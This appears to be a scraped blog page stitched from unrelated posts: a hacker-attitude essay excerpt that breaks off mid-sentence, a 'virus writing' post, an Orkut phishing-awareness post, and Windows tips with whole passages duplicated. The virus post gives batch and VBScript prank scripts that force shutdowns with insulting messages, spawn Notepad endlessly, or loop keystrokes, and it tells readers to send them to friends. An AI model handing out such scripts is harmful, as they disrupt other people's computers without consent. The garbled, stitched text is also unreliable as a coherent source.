To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.
Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.
(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)
3. Boredom and drudgery are evil.
Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.
To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).
(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)
4. Freedom is good.
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.
(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)
Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.
5. Attitude is no substitute for competence.
To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.
Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.
If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.
What Is a Hacker?
What Is a Hacker?
The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant.
There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.
The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.
There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.
The basic difference is this: hackers build things, crackers break them.
If you want to be a hacker, keep reading. If you want to be a cracker, go read the
Virus writing code..!!!!!
in BATCH FILES,VIRUS
friends want to play with your friends computer..?
if yes then start reading this post.
In this article i came with new pranks (or) tricks (or) similar to virus creating ..ya it's acts like a virus but not virus it's a simple programme.
Materials: NOTEPAD
By using only notepad you can create your own virus don't worry it doesn't effect your PC.
Ok the below are the codes of Virus like acting.
* Convey your friend a lil' message and shut down his / her computer:
Type in notepad:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
* Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
* Toggle your friend's Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.
* Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
* Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.
* Ok this is my favorite , this script hacks your friend's keyboard and make him type "You are a fool" simultaneously , u can change " you are a fool" to any anything u want .
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
All this works until system will restart so don't worry.
Please leave your comment ... i love comments.
Hacking Orkut
Google uses a 4 Level Orkut login which makes it difficult to hack Orkut using brute force attack.
First Level- Security-SSL or 128 bit secured connection
Second Level- Google account checks for cookie in the sytem of user
Third Level- Google provides a redirection to the entered User information
Fourth Level- Google doesn’t use conventional php/aspx/asp coding. So it is impossible to hack Orkut using input validation attack!!!
It is not an easy task to hack Orkut by breaking this security! But still some people manages to get access to other’s Orkut accounts. The question concerned is How they do it? Many of them just use simple tricks that fool users and then they themself leak out their password. Here are some points you need to take care of, to prevent your Orkut account being hacked!
Phishing Attack is the most popular way of hacking/stealing other’s password.By using fake login pages it is possible to hack Orkut. Here the users land on a page where they are asked for their login information and they enter their Orkut username and password thinking it to be a real page but actually it is other way round. It submits all the entered details to the creator of the fake login page.
Orkut New Features: I have come across a page(fake page) that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When the user submit’s his/her Orkut login information through this page, there goes his ID and password mailed to the coder.
Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. This is definitely a trap created by the hacker to hack your Orkut password. Clicking on this link will take you to a fake login page and there you loose up your password.
Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it.So be careful, javascripts can even be used to hack Orkut!
Primary mail address: If by some means a hacker came to know the password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on ‘forget password’.This way Google will send link to the already hacked primary email ID to change the password of the Orkut account. Hence the email hacker will change your Orkut account’s password. Hence your, Orkut account is hacked too.
So a better thing would be to keep a very unknown or useless email id of yours as primary email id so that if the hacker clicks on ‘Forgot password’ the password changing link goes to an unknown email id i.e. not known to the hacker.Hence your Orkut account saved.
So, I hope that this post not only teaches you to hack Orkut but also to hack protect your Orkut account.
If you would like to share something, comment here and I will add up here with a credit to your name.
Budget planner for those who spends money
Budget planner for those who spends money
Are you spending or earning money without any plan ?
If yes, then here is the helpful software for those who need to keep on eye about earning and expenditure of Income.
This free budget planner software send by one of our blog reader named SAMARENDRA MOHANTY to my mail box let's say thanks for him.
ok, by using this software(Microsoft Excel Application) we can calculate monthly budget planner, Household budget planner, Transportation budget planning, Utility budget planning and etc and also by using this software we can calculate monthly budget planning. There also a chart for about clearing understanding on the expanses and income.
File size: 43.39 KB
DOWNLOAD: Budget planner
Are you spending or earning money without any plan ?
If yes, then here is the helpful software for those who need to keep on eye about earning and expenditure of Income.
This free budget planner software send by one of our blog reader named SAMARENDRA MOHANTY to my mail box let's say thanks for him.
ok, by using this software(Microsoft Excel Application) we can calculate monthly budget planner, Household budget planner, Transportation budget planning, Utility budget planning and etc and also by using this software we can calculate monthly budget planning. There also a chart for about clearing understanding on the expanses and income.
File size: 43.39 KB
DOWNLOAD: Budget planner
How To Open Multiple ID in Google Talk
How To Open Multiple ID in Google Talk By default, we can open only one instance of Google Talk. This limits us to be online in a single Google Talk ID at a given time. Suppose you want to be online in multiple Google Talk ID's at the same time, then how will you achieve it? The trick is very simple and takes just few seconds to implement.
Just follow few steps as shown below...
1. Place a google talk icon on your desktop & Right-Click Select properties from context-menu navigate to "SHORTCUT TAB" in this concentrate on the "TARGET" option by default it is having the address like this
"C:\Program Files\Google\Google Talk\googletalk.exe" /startmenu
2. All you need to do is just replace that address to below address
"C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex
3. Click Apply and OK then your done.
Screen shot:
Cannot able to Delete Files or Folders ?
Cannot able to Delete Files or Folders ?
When ever we try to delete some files or folder in our PC some times it shows an error like this*
- Cannot delete file: Access is denied*
- There has been a sharing violation.*
- The source or destination file may be in use.*
- The file is in use by another program or user.*
- Make sure the disk is not full or write-protected and that the file is not currently in use.
or some different errors like this when ever you try to delete files. For this problem Unlocker is the solution!. To get rid of this problem follow the simple steps as shown below..
1. First you need to download a software called Unlocker & install it.
2. Simply right click the folder or file and select Unlocker
3. If the folder or file is locked, a window listing of lockers will appear
4. Simply click Unlock All and you are done!Works on: Windows 2000 / XP / 2003 /
VistaFile Size : 237.50 KB
How To Move My Documents Folder To A Different Drive
How To Move My Documents Folder To A Different Drive:
Does ‘My Documents’ sound like a contradiction in terms? In Vista, we impersonally call it Documents but do we really pay attention to this folder which is one of the most important ones in our system? Of course, it is not the only folder we have. But it usually is the default one called by the system when it needs to save something. And here lies its value as a time saver or its Achilles Heel – it depends on the way we manage it.
My Documents is the common folder which by default stores all our personal data i.e. our document files, music, movies, downloads and photos. Within it has the My Music, My Videos and a My Pictures folder to stash a particular file type. So it pays to deal with it like an important filing cabinet and not as a junk drawer.
Over time this folder becomes the ‘Big Daddy’ of all folders. Our personal data storehouse thus needs to be handled well and safeguarded from a digital disaster. It can be done by simply moving it to a safer backup location. In this article we are going to show you how to move the My Documents to a different drive.
There are two serious reasons to do this with immediate effect.
Imagine that all your precious documents, photos and sundry other files are organized beautifully in this folder on the system partition (commonly the C Drive). Imagine a system crash. Imagine the loss of never able to recover that data. And now imagine a simple step which could have saved the day.
The usual good word is to partition your hard disk into multiples with a minimum size kept for the system drive. With time My Documents will fatten up as more data is stashed away in it. Moving the folder to a different drive saves space and more importantly safeguards it.
4. These are the elementary steps which will save you a ton of bother at a future date.
How To Move My Documents Folder in Vista
There is a slight change in Vista as the My Documents has given way to a Documents folder. The default location for this folder is C:\Users\[username]\Documents where [username] is your Windows Vista username and C Drive is the default installation drive. Vista creates Documents folder for each User profile on the computer and stores it in the appropriate profile folder. The process to change the location is relatively same,
1. Click on the Start button.
2. Right-click on Document. For multiple users click your account name in the right-hand menu. Select Properties.
3. In the Properties dialog select the Location tab.
4. Next, click on Move. In the Destination dialog select the new location for your Documents folder. Click on Select Folder to return to the Properties dialog. The new location appears in the text box. 
5. Click on Ok. Vista prompts you to confirm again and with a Yes click your task is done as the documents get shifted over to the new location. 
The brief tutorial might be simplicity itself and experienced users might even scoff at it. But I have seen many neglect this fundamental step of data backup. And isn’t it true that the small things we take for granted are sometimes taken away from us. With few uncomplicated steps, at least it won’t be the documents in our My Documents folder.
Have there been times when you have found movinf My Document folder to a different drive a lifesaver? Or have overlooked it to your loss?
Does ‘My Documents’ sound like a contradiction in terms? In Vista, we impersonally call it Documents but do we really pay attention to this folder which is one of the most important ones in our system? Of course, it is not the only folder we have. But it usually is the default one called by the system when it needs to save something. And here lies its value as a time saver or its Achilles Heel – it depends on the way we manage it.My Documents is the common folder which by default stores all our personal data i.e. our document files, music, movies, downloads and photos. Within it has the My Music, My Videos and a My Pictures folder to stash a particular file type. So it pays to deal with it like an important filing cabinet and not as a junk drawer.
Over time this folder becomes the ‘Big Daddy’ of all folders. Our personal data storehouse thus needs to be handled well and safeguarded from a digital disaster. It can be done by simply moving it to a safer backup location. In this article we are going to show you how to move the My Documents to a different drive.
There are two serious reasons to do this with immediate effect.
Imagine that all your precious documents, photos and sundry other files are organized beautifully in this folder on the system partition (commonly the C Drive). Imagine a system crash. Imagine the loss of never able to recover that data. And now imagine a simple step which could have saved the day.
The usual good word is to partition your hard disk into multiples with a minimum size kept for the system drive. With time My Documents will fatten up as more data is stashed away in it. Moving the folder to a different drive saves space and more importantly safeguards it.
How To Move My Documents Folder in Windows XP
- Right click on the My Documents icon on the desktop.
2. Click on Move and choose your chosen location for the folder. Move it to a different partition. For instance, I have it on my D Drive. 
4. These are the elementary steps which will save you a ton of bother at a future date.
How To Move My Documents Folder in Vista
There is a slight change in Vista as the My Documents has given way to a Documents folder. The default location for this folder is C:\Users\[username]\Documents where [username] is your Windows Vista username and C Drive is the default installation drive. Vista creates Documents folder for each User profile on the computer and stores it in the appropriate profile folder. The process to change the location is relatively same,
1. Click on the Start button.
2. Right-click on Document. For multiple users click your account name in the right-hand menu. Select Properties.
3. In the Properties dialog select the Location tab.
4. Next, click on Move. In the Destination dialog select the new location for your Documents folder. Click on Select Folder to return to the Properties dialog. The new location appears in the text box. 5. Click on Ok. Vista prompts you to confirm again and with a Yes click your task is done as the documents get shifted over to the new location. The brief tutorial might be simplicity itself and experienced users might even scoff at it. But I have seen many neglect this fundamental step of data backup. And isn’t it true that the small things we take for granted are sometimes taken away from us. With few uncomplicated steps, at least it won’t be the documents in our My Documents folder.
Have there been times when you have found movinf My Document folder to a different drive a lifesaver? Or have overlooked it to your loss?
Subscribe to:
Posts (Atom)